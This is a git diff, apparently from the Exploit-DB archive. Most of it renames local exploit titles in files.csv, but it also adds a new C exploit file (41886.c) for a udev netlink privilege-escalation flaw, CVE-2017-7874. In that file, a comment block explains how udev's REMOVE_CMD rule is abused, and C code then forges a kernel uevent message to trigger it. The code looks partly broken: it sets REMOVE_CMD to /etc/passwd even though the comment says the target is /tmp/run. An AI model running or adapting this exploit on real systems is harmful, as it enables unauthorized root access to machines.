diff --git a/files.csv b/files.csv index ab1927756..d91439d94 100644 --- a/files.csv +++ b/files.csv @@ -5493,13 +5493,13 @@ id,file,description,date,author,platform,type,port 125,platforms/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",bsd,local,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation (PoC)",2003-12-02,"Christophe Devine",linux,local,0 131,platforms/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation",2003-12-05,"Wojciech Purczynski",linux,local,0 -134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Privilege Escalation",2003-12-16,watercloud,hp-ux,local,0 +134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - '/usr/bin/ct' Format String Privilege Escalation",2003-12-16,watercloud,hp-ux,local,0 140,platforms/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",linux,local,0 -152,platforms/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0 +152,platforms/linux/local/152.c,"rsync 2.5.7 - Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0 154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",linux,local,0 160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation",2004-03-01,"Paul Starzetz",linux,local,0 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 @@ -5739,7 +5739,7 @@ id,file,description,date,author,platform,type,port 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0 -1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0 +1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 @@ -6949,7 +6949,7 @@ id,file,description,date,author,platform,type,port 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,windows,local,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0 40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0 -17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 +17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 @@ -7530,7 +7530,7 @@ id,file,description,date,author,platform,type,port 20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 - '.joerc' Arbitrary Command Execution",2001-02-28,"Wkit Security",unix,local,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (2)",2001-03-08,"the itch",unix,local,0 -40426,platforms/windows/local/40426.txt,"MSI - 'NTIOLib.sys' / 'WinIO.sys' Local Privilege Escalation",2016-09-26,ReWolf,windows,local,0 +40426,platforms/windows/local/40426.txt,"MSI - 'NTIOLib.sys' / 'WinIO.sys' Privilege Escalation",2016-09-26,ReWolf,windows,local,0 20684,platforms/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip - Buffer Overflow",2001-03-27,"Pablo Sor",solaris,local,0 20691,platforms/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 - mount Buffer Overflow",2001-03-13,"Frank DENIS",linux,local,0 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched - Long Error Message Buffer Overflow",2001-03-19,"Luciano Rocha",unix,local,0 @@ -7771,7 +7771,7 @@ id,file,description,date,author,platform,type,port 21843,platforms/windows/local/21843.rb,"Microsoft Windows - Escalate UAC Execute RunAs (Metasploit)",2012-10-10,Metasploit,windows,local,0 21844,platforms/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)",2012-10-10,Metasploit,windows,local,0 21845,platforms/windows/local/21845.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Metasploit)",2012-10-10,Metasploit,windows,local,0 -21848,platforms/linux/local/21848.rb,"Linux Kernel UDEV < 1.4.1 - Netlink Privilege Escalation (Metasploit)",2012-10-10,Metasploit,linux,local,0 +21848,platforms/linux/local/21848.rb,"Linux Kernel UDEV < 1.4.1 - 'Netlink' Privilege Escalation (Metasploit)",2012-10-10,Metasploit,linux,local,0 21856,platforms/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification",2002-09-25,"Mike Riley",multiple,local,0 21865,platforms/linux/local/21865.c,"Interbase 5/6 - GDS_Lock_MGR UMask File Permission Changing",2002-09-25,grazer,linux,local,0 21871,platforms/linux/local/21871.c,"GV 2.x/3.x - Malformed '.PDF'/'.PS' File Buffer Overflow (1)",2002-09-26,zen-parse,linux,local,0 @@ -7922,7 +7922,7 @@ id,file,description,date,author,platform,type,port 23063,platforms/bsd/local/23063.c,"BSD-Games 2.x - Monop Player Name Local Buffer Overrun (2)",2003-08-25,N4rK07IX,bsd,local,0 23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit",2012-12-02,kingcope,linux,local,0 23096,platforms/windows/local/23096.txt,"Microsoft WordPerfect - Converter Buffer Overrun",2003-09-03,valgasu,windows,local,0 -23119,platforms/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure Local File Storage Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 +23119,platforms/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass",2003-09-15,Texonet,sco,local,0 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local,0 @@ -8053,7 +8053,7 @@ id,file,description,date,author,platform,type,port 25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0 25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,linux,local,0 25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0 -25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0 +25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)",2005-04-08,qobaiashi,linux,local,0 @@ -8129,7 +8129,7 @@ id,file,description,date,author,platform,type,port 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local,0 26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0 40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local(8) - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 -26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Local Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 +26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 - GetShell and GetCommand Partial File Disclosure",2006-01-01,xfocus,aix,local,0 @@ -8209,7 +8209,7 @@ id,file,description,date,author,platform,type,port 30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass",2007-05-15,"Matousec Transparent security",multiple,local,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Privilege Escalation",2007-05-08,"Daniele Calore",unix,local,0 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0 -30014,platforms/windows/local/30014.py,"Microsoft Windows - 'NDPROXY' Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 +30014,platforms/windows/local/30014.py,"Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 @@ -8353,7 +8353,7 @@ id,file,description,date,author,platform,type,port 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0 40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0 33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0 -33516,platforms/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",lin_x86-64,local,0 +33516,platforms/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",lin_x86-64,local,0 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0 33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0 33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0 @@ -8393,7 +8393,7 @@ id,file,description,date,author,platform,type,port 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,windows,local,0 34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape (PoC)",2014-09-13,"Joxean Koret",windows,local,0 -34822,platforms/windows/local/34822.c,"Microsoft Windows - Local procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,windows,local,0 +34822,platforms/windows/local/34822.c,"Microsoft Windows - Local Procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,windows,local,0 34923,platforms/linux/local/34923.c,"Linux Kernel < 3.16.1 - 'Remount FUSE' Privilege Escalation",2014-10-09,"Andy Lutomirski",linux,local,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 34954,platforms/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",hardware,local,0 @@ -8589,7 +8589,7 @@ id,file,description,date,author,platform,type,port 38287,platforms/windows/local/38287.txt,"Kaspersky AntiVirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0 38289,platforms/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Privilege Escalation",2015-09-22,"Google Security Research",windows,local,0 38298,platforms/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local,0 -38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 - Local Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 +38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 - Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation (via DMG Install Script)",2015-09-23,"Yorick Koster",osx,local,0 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0 38319,platforms/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,windows,local,0 @@ -8751,7 +8751,7 @@ id,file,description,date,author,platform,type,port 40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)",2016-07-13,Metasploit,windows,local,0 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 -40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0 +40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0 40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 @@ -8902,7 +8902,7 @@ id,file,description,date,author,platform,type,port 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0 41542,platforms/windows/local/41542.c,"USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0 41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0 -41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,windows,local,0 +41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation",2017-03-15,ReWolf,windows,local,0 41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0 41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0 41675,platforms/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0 @@ -8918,6 +8918,7 @@ id,file,description,date,author,platform,type,port 41710,platforms/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,windows,local,0 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0 +41886,platforms/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation",2017-04-15,"Nassim Asrir",linux,local,0 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0 41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0 @@ -8938,7 +8939,7 @@ id,file,description,date,author,platform,type,port 41870,platforms/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",multiple,local,0 41871,platforms/solaris/local/41871.sh,"Solaris 7 < 11 (x86 / SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",solaris,local,0 41873,platforms/osx/local/41873.sh,"GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation",2017-04-13,"Hacker Fantastic",osx,local,0 -41875,platforms/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Local Kernel Exploit",2017-04-02,"Hacker Fantastic",linux,local,0 +41875,platforms/linux/local/41875.py,"PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation",2017-04-02,"Hacker Fantastic",linux,local,0 41878,platforms/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Privilege Escalation",2017-04-13,hyp3rlinx,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 diff --git a/platforms/linux/local/41886.c b/platforms/linux/local/41886.c new file mode 100755 index 000000000..0d59cb4ab --- /dev/null +++ b/platforms/linux/local/41886.c @@ -0,0 +1,97 @@ +/* +# Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation +# Author: Nassim Asrir +# Researcher at: Henceforth +# Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ +# The full Research: https://www.facebook.com/asrirnassim/ +# CVE: CVE-2017-7874 + +# Exp # + +first of all we need to know a small infos about udev and how it work + +the udev deamon is responsible for receiving device events from the kernel + +and this event are delivered to udev via netlink (is a socket family) + +you can read more about udev from: https://en.wikipedia.org/wiki/Udev + +# Exploit # + +The udev vulnerability resulted from a lack of verification of the netlink message source in udevd. + +read lines from: /lib/udev/rules.d/50-udev-default.rules + +all we need is this action: ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}" + +this action allows execution of arbitrary commands. + +in our exploit we specifying a malicious REMOVE_CMD and causes the privileged execution of attacker-controlled /tmp/run file. + +Get your udev version: + +Execute: $ udevadm --version + +//output: 232 + +Maybe < 232 also is vulnerable +*/ + + + +// gcc rootme.c -o rootme +// ./rootme +// segmantation fault + +#include +#include +#include +#include +#include +#include +#include + +#ifndef NETLINK_KOBJECT_UEVENT +#define NETLINK_KOBJECT_UEVENT 15 +#endif + +int +main(int argc, char **argv) +{ + int sock; + char *mp; + char message[4096]; + struct msghdr msg; + struct iovec iovector; + struct sockaddr_nl address; + + memset(&address, 0, sizeof(address)); + address.nl_family = AF_NETLINK; + address.nl_pid = atoi(argv[1]); + address.nl_groups = 0; + + msg.msg_name = (void*)&address; + msg.msg_namelen = sizeof(address); + msg.msg_iov = &iovector; + msg.msg_iovlen = 1; + + sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); + bind(sock, (struct sockaddr *) &address, sizeof(address)); + + mp = message; + mp += sprintf(mp, "a@/d") + 1; + mp += sprintf(mp, "SUBSYSTEM=block") + 1; + mp += sprintf(mp, "DEVPATH=/dev/foo") + 1; + mp += sprintf(mp, "TIMEOUT=10") + 1; + mp += sprintf(mp, "ACTION=remove") +1; + mp += sprintf(mp, "REMOVE_CMD=/etc/passwd") +1; + + iovector.iov_base = (void*)message; + iovector.iov_len = (int)(mp-message); + + sendmsg(sock, &msg, 0); + + close(sock); + + return 0; +} \ No newline at end of file